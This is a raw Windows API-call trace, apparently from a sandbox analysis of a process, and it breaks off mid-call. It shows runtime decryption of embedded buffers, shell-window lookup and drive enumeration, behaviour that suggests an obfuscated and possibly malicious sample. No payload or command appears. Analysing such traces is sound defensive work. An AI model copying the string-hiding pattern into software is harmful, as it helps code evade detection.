[0052.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x4) returned 0x6161d0 [0052.490] GetProcessHeap () returned 0x600000 [0052.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x20) returned 0x614420 [0052.490] CryptImportKey (in: hProv=0x614968, pbData=0x18fee0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x6147f4 | out: phKey=0x6147f4*=0x6160f0) returned 1 [0052.491] CryptDecrypt (in: hKey=0x6160f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x614420, pdwDataLen=0x18ff48 | out: pbData=0x614420, pdwDataLen=0x18ff48) returned 1 [0052.491] CryptDestroyKey (hKey=0x6160f0) returned 1 [0052.491] GetProcessHeap () returned 0x600000 [0052.491] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6161e0 [0052.491] GetProcessHeap () returned 0x600000 [0052.491] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xe) returned 0x615d38 [0052.491] GetProcessHeap () returned 0x600000 [0052.491] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x614420 | out: hHeap=0x600000) returned 1 [0052.491] GetProcessHeap () returned 0x600000 [0052.491] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x4) returned 0x6161f0 [0052.491] GetProcessHeap () returned 0x600000 [0052.491] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x20) returned 0x614420 [0052.491] CryptImportKey (in: hProv=0x614968, pbData=0x18fee0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x6147f4 | out: phKey=0x6147f4*=0x6160f0) returned 1 [0052.491] CryptDecrypt (in: hKey=0x6160f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x614420, pdwDataLen=0x18ff48 | out: pbData=0x614420, pdwDataLen=0x18ff48) returned 1 [0052.491] CryptDestroyKey (hKey=0x6160f0) returned 1 [0052.491] GetProcessHeap () returned 0x600000 [0052.491] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616200 [0052.491] GetProcessHeap () returned 0x600000 [0052.491] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x1a) returned 0x614448 [0052.491] GetProcessHeap () returned 0x600000 [0052.491] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x614420 | out: hHeap=0x600000) returned 1 [0052.491] GetProcessHeap () returned 0x600000 [0052.491] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x4) returned 0x616210 [0052.491] GetProcessHeap () returned 0x600000 [0052.491] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x1a0) returned 0x616598 [0052.491] CryptImportKey (in: hProv=0x614968, pbData=0x18fee0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x6147f4 | out: phKey=0x6147f4*=0x6160f0) returned 1 [0052.491] CryptDecrypt (in: hKey=0x6160f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x616598, pdwDataLen=0x18ff48 | out: pbData=0x616598, pdwDataLen=0x18ff48) returned 1 [0052.491] CryptDestroyKey (hKey=0x6160f0) returned 1 [0052.491] GetProcessHeap () returned 0x600000 [0052.491] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616220 [0052.491] GetProcessHeap () returned 0x600000 [0052.491] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616230 [0052.491] GetProcessHeap () returned 0x600000 [0052.491] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616240 [0052.491] GetProcessHeap () returned 0x600000 [0052.492] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616250 [0052.492] GetProcessHeap () returned 0x600000 [0052.492] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616260 [0052.492] GetProcessHeap () returned 0x600000 [0052.492] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616270 [0052.492] GetProcessHeap () returned 0x600000 [0052.492] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616280 [0052.492] GetProcessHeap () returned 0x600000 [0052.492] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616290 [0052.492] GetProcessHeap () returned 0x600000 [0052.492] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6162a0 [0052.492] GetProcessHeap () returned 0x600000 [0052.492] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x615d50 [0052.492] GetProcessHeap () returned 0x600000 [0052.492] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6162b0 [0052.492] GetProcessHeap () returned 0x600000 [0052.492] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x615d68 [0052.492] GetProcessHeap () returned 0x600000 [0052.492] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6162c0 [0052.492] GetProcessHeap () returned 0x600000 [0052.492] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x615d80 [0052.492] GetProcessHeap () returned 0x600000 [0052.492] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6162d0 [0052.492] GetProcessHeap () returned 0x600000 [0052.492] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6162e0 [0052.492] GetProcessHeap () returned 0x600000 [0052.492] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6162f0 [0052.492] GetProcessHeap () returned 0x600000 [0052.492] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616300 [0052.492] GetProcessHeap () returned 0x600000 [0052.492] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616310 [0052.492] GetProcessHeap () returned 0x600000 [0052.492] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616320 [0052.492] GetProcessHeap () returned 0x600000 [0052.492] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616330 [0052.492] GetProcessHeap () returned 0x600000 [0052.492] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x6) returned 0x616340 [0052.492] GetProcessHeap () returned 0x600000 [0052.492] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616350 [0052.493] GetProcessHeap () returned 0x600000 [0052.493] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x16) returned 0x6160f0 [0052.493] GetProcessHeap () returned 0x600000 [0052.493] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616360 [0052.493] GetProcessHeap () returned 0x600000 [0052.493] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xe) returned 0x615d98 [0052.493] GetProcessHeap () returned 0x600000 [0052.493] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616370 [0052.493] GetProcessHeap () returned 0x600000 [0052.493] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xe) returned 0x615db0 [0052.493] GetProcessHeap () returned 0x600000 [0052.493] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616380 [0052.493] GetProcessHeap () returned 0x600000 [0052.493] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616390 [0052.493] GetProcessHeap () returned 0x600000 [0052.493] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6163a0 [0052.493] GetProcessHeap () returned 0x600000 [0052.493] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6163b0 [0052.493] GetProcessHeap () returned 0x600000 [0052.493] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6163c0 [0052.493] GetProcessHeap () returned 0x600000 [0052.493] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6163d0 [0052.493] GetProcessHeap () returned 0x600000 [0052.493] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6163e0 [0052.493] GetProcessHeap () returned 0x600000 [0052.493] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6163f0 [0052.493] GetProcessHeap () returned 0x600000 [0052.493] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616400 [0052.493] GetProcessHeap () returned 0x600000 [0052.493] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616410 [0052.493] GetProcessHeap () returned 0x600000 [0052.493] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616420 [0052.493] GetProcessHeap () returned 0x600000 [0052.493] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616430 [0052.493] GetProcessHeap () returned 0x600000 [0052.493] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616440 [0052.493] GetProcessHeap () returned 0x600000 [0052.493] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616450 [0052.493] GetProcessHeap () returned 0x600000 [0052.493] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616460 [0052.494] GetProcessHeap () returned 0x600000 [0052.494] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616470 [0052.494] GetProcessHeap () returned 0x600000 [0052.494] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616480 [0052.494] GetProcessHeap () returned 0x600000 [0052.494] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616490 [0052.494] GetProcessHeap () returned 0x600000 [0052.494] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6164a0 [0052.494] GetProcessHeap () returned 0x600000 [0052.494] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x615dc8 [0052.494] GetProcessHeap () returned 0x600000 [0052.494] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6164b0 [0052.494] GetProcessHeap () returned 0x600000 [0052.494] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6164c0 [0052.494] GetProcessHeap () returned 0x600000 [0052.494] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6164d0 [0052.494] GetProcessHeap () returned 0x600000 [0052.494] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6164e0 [0052.494] GetProcessHeap () returned 0x600000 [0052.494] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6164f0 [0052.494] GetProcessHeap () returned 0x600000 [0052.494] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616500 [0052.494] GetProcessHeap () returned 0x600000 [0052.494] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616510 [0052.494] GetProcessHeap () returned 0x600000 [0052.494] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x615de0 [0052.494] GetProcessHeap () returned 0x600000 [0052.494] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616520 [0052.494] GetProcessHeap () returned 0x600000 [0052.494] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616530 [0052.494] GetProcessHeap () returned 0x600000 [0052.494] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616540 [0052.494] GetProcessHeap () returned 0x600000 [0052.494] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616550 [0052.494] GetProcessHeap () returned 0x600000 [0052.494] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616560 [0052.494] GetProcessHeap () returned 0x600000 [0052.494] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616570 [0052.495] GetProcessHeap () returned 0x600000 [0052.495] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616580 [0052.495] GetProcessHeap () returned 0x600000 [0052.495] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616758 [0052.495] GetProcessHeap () returned 0x600000 [0052.495] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616768 [0052.495] GetProcessHeap () returned 0x600000 [0052.495] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616778 [0052.495] GetProcessHeap () returned 0x600000 [0052.495] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616788 [0052.495] GetProcessHeap () returned 0x600000 [0052.495] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616798 [0052.495] GetProcessHeap () returned 0x600000 [0052.495] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6167a8 [0052.495] GetProcessHeap () returned 0x600000 [0052.495] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6167b8 [0052.495] GetProcessHeap () returned 0x600000 [0052.495] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6167c8 [0052.495] GetProcessHeap () returned 0x600000 [0052.495] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x615df8 [0052.495] GetProcessHeap () returned 0x600000 [0052.495] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6167d8 [0052.495] GetProcessHeap () returned 0x600000 [0052.495] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6167e8 [0052.495] GetProcessHeap () returned 0x600000 [0052.495] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6167f8 [0052.495] GetProcessHeap () returned 0x600000 [0052.495] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x12) returned 0x616110 [0052.495] GetProcessHeap () returned 0x600000 [0052.495] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616808 [0052.495] GetProcessHeap () returned 0x600000 [0052.495] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x615e10 [0052.495] GetProcessHeap () returned 0x600000 [0052.495] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616818 [0052.495] GetProcessHeap () returned 0x600000 [0052.496] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xe) returned 0x615e28 [0052.496] GetProcessHeap () returned 0x600000 [0052.496] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616828 [0052.496] GetProcessHeap () returned 0x600000 [0052.496] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616838 [0052.496] GetProcessHeap () returned 0x600000 [0052.496] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616848 [0052.496] GetProcessHeap () returned 0x600000 [0052.496] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x615e40 [0052.496] GetProcessHeap () returned 0x600000 [0052.496] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616858 [0052.496] GetProcessHeap () returned 0x600000 [0052.496] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x615e58 [0052.496] GetProcessHeap () returned 0x600000 [0052.496] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616598 | out: hHeap=0x600000) returned 1 [0052.496] GetProcessHeap () returned 0x600000 [0052.496] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x4) returned 0x616868 [0052.496] GetProcessHeap () returned 0x600000 [0052.496] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xe0) returned 0x616598 [0052.496] CryptImportKey (in: hProv=0x614968, pbData=0x18fee0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x6147f4 | out: phKey=0x6147f4*=0x616130) returned 1 [0052.496] CryptDecrypt (in: hKey=0x616130, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x616598, pdwDataLen=0x18ff48 | out: pbData=0x616598, pdwDataLen=0x18ff48) returned 1 [0052.496] CryptDestroyKey (hKey=0x616130) returned 1 [0052.496] GetProcessHeap () returned 0x600000 [0052.496] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616878 [0052.496] GetProcessHeap () returned 0x600000 [0052.496] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x615e70 [0052.496] GetProcessHeap () returned 0x600000 [0052.496] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616888 [0052.496] GetProcessHeap () returned 0x600000 [0052.496] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xe) returned 0x615e88 [0052.496] GetProcessHeap () returned 0x600000 [0052.496] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616898 [0052.496] GetProcessHeap () returned 0x600000 [0052.496] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x14) returned 0x616130 [0052.497] GetProcessHeap () returned 0x600000 [0052.497] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6168a8 [0052.497] GetProcessHeap () returned 0x600000 [0052.497] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x16) returned 0x616150 [0052.497] GetProcessHeap () returned 0x600000 [0052.497] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6168b8 [0052.497] GetProcessHeap () returned 0x600000 [0052.497] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x20) returned 0x614420 [0052.497] GetProcessHeap () returned 0x600000 [0052.497] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6168c8 [0052.497] GetProcessHeap () returned 0x600000 [0052.497] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x22) returned 0x616680 [0052.497] GetProcessHeap () returned 0x600000 [0052.497] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6168d8 [0052.497] GetProcessHeap () returned 0x600000 [0052.497] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6168e8 [0052.497] GetProcessHeap () returned 0x600000 [0052.497] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6168f8 [0052.497] GetProcessHeap () returned 0x600000 [0052.497] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x1a) returned 0x614470 [0052.497] GetProcessHeap () returned 0x600000 [0052.497] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616908 [0052.497] GetProcessHeap () returned 0x600000 [0052.497] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x615ea0 [0052.497] GetProcessHeap () returned 0x600000 [0052.497] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616918 [0052.497] GetProcessHeap () returned 0x600000 [0052.497] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616928 [0052.497] GetProcessHeap () returned 0x600000 [0052.497] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616938 [0052.497] GetProcessHeap () returned 0x600000 [0052.497] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616948 [0052.497] GetProcessHeap () returned 0x600000 [0052.498] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616598 | out: hHeap=0x600000) returned 1 [0052.498] GetProcessHeap () returned 0x600000 [0052.498] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x24) returned 0x6166b0 [0052.498] GetProcessHeap () returned 0x600000 [0052.498] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616958 [0052.498] GetProcessHeap () returned 0x600000 [0052.498] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40) returned 0x6166e0 [0052.498] CryptImportKey (in: hProv=0x614968, pbData=0x18fee0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x6147f4 | out: phKey=0x6147f4*=0x616598) returned 1 [0052.498] CryptDecrypt (in: hKey=0x616598, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6166e0, pdwDataLen=0x18ff48 | out: pbData=0x6166e0, pdwDataLen=0x18ff48) returned 1 [0052.498] CryptDestroyKey (hKey=0x616598) returned 1 [0052.498] GetProcessHeap () returned 0x600000 [0052.498] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616968 [0052.498] GetProcessHeap () returned 0x600000 [0052.498] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x12) returned 0x616170 [0052.498] GetProcessHeap () returned 0x600000 [0052.498] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x1a) returned 0x6144c0 [0052.498] GetProcessHeap () returned 0x600000 [0052.498] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6166e0 | out: hHeap=0x600000) returned 1 [0052.498] GetShellWindow () returned 0x100f2 [0052.498] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x41aa68 | out: lpdwProcessId=0x41aa68) returned 0x458 [0052.499] GetProcessHeap () returned 0x600000 [0052.499] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x20) returned 0x6144e8 [0052.499] CryptImportKey (in: hProv=0x614968, pbData=0x18fee0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x6147f4 | out: phKey=0x6147f4*=0x6166e0) returned 1 [0052.499] CryptDecrypt (in: hKey=0x6166e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6144e8, pdwDataLen=0x18ff48 | out: pbData=0x6144e8, pdwDataLen=0x18ff48) returned 1 [0052.499] CryptDestroyKey (hKey=0x6166e0) returned 1 [0052.499] GetProcessHeap () returned 0x600000 [0052.499] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x20) returned 0x614510 [0052.499] CryptImportKey (in: hProv=0x614968, pbData=0x18fee0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x6147f4 | out: phKey=0x6147f4*=0x6166e0) returned 1 [0052.499] CryptDecrypt (in: hKey=0x6166e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x614510, pdwDataLen=0x18ff48 | out: pbData=0x614510, pdwDataLen=0x18ff48) returned 1 [0052.499] CryptDestroyKey (hKey=0x6166e0) returned 1 [0052.499] GetProcessHeap () returned 0x600000 [0052.499] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x20) returned 0x614538 [0052.499] CryptImportKey (in: hProv=0x614968, pbData=0x18fee0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x6147f4 | out: phKey=0x6147f4*=0x6166e0) returned 1 [0052.499] CryptDecrypt (in: hKey=0x6166e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x614538, pdwDataLen=0x18ff48 | out: pbData=0x614538, pdwDataLen=0x18ff48) returned 1 [0052.499] CryptDestroyKey (hKey=0x6166e0) returned 1 [0052.499] GetProcessHeap () returned 0x600000 [0052.499] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x20) returned 0x616b58 [0052.499] CryptImportKey (in: hProv=0x614968, pbData=0x18fcb8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x6147f4 | out: phKey=0x6147f4*=0x6166e0) returned 1 [0052.499] CryptDecrypt (in: hKey=0x6166e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x616b58, pdwDataLen=0x18fd24 | out: pbData=0x616b58, pdwDataLen=0x18fd24) returned 1 [0052.499] CryptDestroyKey (hKey=0x6166e0) returned 1 [0052.499] GetProcessHeap () returned 0x600000 [0052.499] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x60) returned 0x616598 [0052.500] CryptImportKey (in: hProv=0x614968, pbData=0x18fcb8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x6147f4 | out: phKey=0x6147f4*=0x6166e0) returned 1 [0052.500] CryptDecrypt (in: hKey=0x6166e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x616598, pdwDataLen=0x18fd24 | out: pbData=0x616598, pdwDataLen=0x18fd24) returned 1 [0052.500] CryptDestroyKey (hKey=0x6166e0) returned 1 [0052.500] GetEnvironmentVariableW (in: lpName="SystemDrive", lpBuffer=0x18fd28, nSize=0x104 | out: lpBuffer="C:") returned 0x2 [0052.500] GetProcessHeap () returned 0x600000 [0052.500] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616b58 | out: hHeap=0x600000) returned 1 [0052.500] GetProcessHeap () returned 0x600000 [0052.500] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x20) returned 0x616b58 [0052.500] CryptImportKey (in: hProv=0x614968, pbData=0x18fcb8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x6147f4 | out: phKey=0x6147f4*=0x6166e0) returned 1 [0052.500] CryptDecrypt (in: hKey=0x6166e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x616b58, pdwDataLen=0x18fd24 | out: pbData=0x616b58, pdwDataLen=0x18fd24) returned 1 [0052.500] CryptDestroyKey (hKey=0x6166e0) returned 1 [0052.500] GetProcessHeap () returned 0x600000 [0052.500] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x60) returned 0x616600 [0052.500] CryptImportKey (in: hProv=0x614968, pbData=0x18fcb8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x6147f4 | out: phKey=0x6147f4*=0x6166e0) returned 1 [0052.500] CryptDecrypt (in: hKey=0x6166e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x616600, pdwDataLen=0x18fd24 | out: pbData=0x616600, pdwDataLen=0x18fd24) returned 1 [0052.500] CryptDestroyKey (hKey=0x6166e0) returned 1 [0052.500] GetEnvironmentVariableW (in: lpName="SystemDrive", lpBuffer=0x18fd28, nSize=0x104 | out: lpBuffer="C:") returned 0x2 [0052.500] GetProcessHeap () returned 0x600000 [0052.500] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616b58 | out: hHeap=0x600000) returned 1 [0052.500] GetProcessHeap () returned 0x600000 [0052.500] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x1e) returned 0x616b58 [0052.500] GetProcessHeap () returned 0x600000 [0052.500] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x12) returned 0x6166e0 [0052.500] GetProcessHeap () returned 0x600000 [0052.500] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616978 [0052.500] GetProcessHeap () returned 0x600000 [0052.500] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40) returned 0x617358 [0052.501] GetProcessHeap () returned 0x600000 [0052.501] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x80) returned 0x618340 [0052.501] CryptImportKey (in: hProv=0x614968, pbData=0x18fee0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x6147f4 | out: phKey=0x6147f4*=0x616700) returned 1 [0052.501] CryptDecrypt (in: hKey=0x616700, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x618340, pdwDataLen=0x18ff48 | out: pbData=0x618340, pdwDataLen=0x18ff48) returned 1 [0052.501] CryptDestroyKey (hKey=0x616700) returned 1 [0052.501] GetProcessHeap () returned 0x600000 [0052.501] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x80) returned 0x6183c8 [0052.501] CryptImportKey (in: hProv=0x614968, pbData=0x18fee0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x6147f4 | out: phKey=0x6147f4*=0x616700) returned 1 [0052.501] CryptDecrypt (in: hKey=0x616700, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6183c8, pdwDataLen=0x18ff48 | out: pbData=0x6183c8, pdwDataLen=0x18ff48) returned 1 [0052.501] CryptDestroyKey (hKey=0x616700) returned 1 [0052.501] SetErrorMode (uMode=0x1) returned 0x0 [0052.501] GetLogicalDrives () returned 0x4 [0052.501] GetProcessHeap () returned 0x600000 [0052.501] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40) returned 0x6173a0 [0052.501] CryptImportKey (in: hProv=0x614968, pbData=0x18fa50, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x6147f4 | out: 